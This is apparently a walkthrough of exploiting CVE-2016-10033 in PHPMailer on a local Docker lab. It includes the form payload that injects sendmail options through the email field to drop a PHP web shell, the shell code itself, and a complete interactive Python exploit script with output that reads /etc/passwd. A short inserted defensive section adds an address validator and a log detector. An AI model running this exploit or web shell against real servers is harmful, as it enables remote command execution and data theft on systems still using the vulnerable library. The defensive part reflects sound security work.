PHP Mailer

Clone the repository first, or download it via Dropbox.

$ git clone https://github.com/opsxcq/exploit-CVE-2016-10033.git

Run the Docker container as a simulation of the vulnerable web application.

$ docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033

Downloading the Docker image takes a while; wait until it finishes.

Open localhost:8080 in your browser.

There is a form consisting of name, message, and email fields.

Finally

To carry out the exploitation, fill each field with the data below.

data = {
    'name': '<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>',
    'email': '\"vulnerables\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @test.com',
    'message': 'Pwned',
    'action': 'submit'
}

As explained, the attacker can write code to the server at /var/www/backdoor.php containing the shell code.

<?php
  echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|";
?>

That file can then be accessed in the browser at localhost:8080/backdoor.php.
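As an added defensive example (not part of the original write-up or the exploit repository): the injected sender value shown above fails a strict address allow-list, and use of the dropped file via its cmd parameter stands out in the web server access log. The log lines are constructed samples.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# CVE-2016-10033 abuses the sender value that PHP's mail() hands to
# `sendmail -f<sender>`: a quoted local part lets extra sendmail options
# such as -OQueueDirectory and -X (write a log file) ride along.
# A plain mailbox@domain allow-list rejects every such value.
SAFE_ADDRESS = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Tokens that only make sense as sendmail command-line options.
SENDMAIL_OPTIONS = re.compile(r"(?:^|\s)-(?:X|O\w+=|C|f)\S*")

def classify_sender(addr):
    """Explain why a submitted sender address is or is not acceptable."""
    reasons = []
    if not SAFE_ADDRESS.fullmatch(addr):
        reasons.append("not a plain mailbox@domain address")
    if SENDMAIL_OPTIONS.search(addr):
        reasons.append("contains sendmail option tokens")
    return {"accept": not reasons, "reasons": reasons}

# Second stage: the dropped file is driven with GET /<file>.php?cmd=<base64>,
# which stands out in the web server access log.
LOG_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def find_backdoor_hits(log_lines):
    """Return (path, decoded command) for requests that look like shell use."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith(".php"):
            continue
        for value in parse_qs(url.query).get("cmd", []):
            try:  # '+' in base64 arrives as a space unless percent-encoded
                cmd = base64.b64decode(value.replace(" ", "+"), validate=True)
                hits.append((url.path, cmd.decode("utf-8")))
            except (ValueError, UnicodeDecodeError):
                continue
    return hits

# Constructed sample access-log lines (not from the original page).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2020:10:00:03 +0000] "GET /shell.php?cmd=d2hvYW1p HTTP/1.1" 200 88',
    '10.0.0.5 - - [01/Jan/2020:10:00:09 +0000] "GET /shell.php?cmd=Y2F0IC9ldGMvcGFzc3dk HTTP/1.1" 200 2048',
]
```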

Simulation

The exploitation can be carried out with curl or Python Requests.

Curl

See the `exploit.sh` script.

Python

import base64
import re

import requests

URL = 'http://localhost:8080/'


def get_middle_string(s, b, e):
    # Return every substring of s between the markers b and e.
    # The markers are escaped because '|' is a regex metacharacter, and
    # DOTALL lets the match span the multi-line command output.
    r = r"%s(.*?)%s" % (re.escape(b), re.escape(e))
    return re.findall(r, s, re.DOTALL)


def is_shell_uploaded(filename):
    # Submit the form; the email field smuggles sendmail options so that the
    # SMTP log (-X) is written to /www/<filename> and carries the PHP payload
    # placed in the name field.
    data_binary = {
        'name': (None, '<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>'),
        'email': (None, '\"vulnerables\\\" -OQueueDirectory=/tmp -X/www/{} server\" @test.com'.format(filename)),
        'message': (None, 'Pwned'),
        'action': (None, 'submit')
    }

    x = requests.post(url=URL, files=data_binary)
    return x.status_code == 200


def interactive_shell(filename, cmd):
    # The dropped file base64-decodes the cmd parameter and runs it; passing
    # it via params= percent-encodes '+' and '=' so the value arrives intact.
    encoded = base64.b64encode(cmd.encode()).decode()
    x = requests.get(URL + filename, params={'cmd': encoded})
    # system() prints the raw output into the page between the
    # 'Message from ' log header and the '|' marker of the echoed payload.
    found = get_middle_string(x.text, 'Message from ', '|')
    return found[0] if found else ''


if __name__ == '__main__':
    filename = 'shell.php'
    cmd = 'whoami'
    # Drop the file first, then drive it.
    is_shell_uploaded(filename)
    interactive_shell(filename, cmd)
    while True:
        cmd = input('[*] Command >>> ')
        print(interactive_shell(filename, cmd))

Output.

$ python exploit.py 
[*] Command >>> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
smmta:x:104:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:105:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false

[*] Command >>> ls
backdoor.php
index.php
shell.php
vulnerable

[*] Command >>>
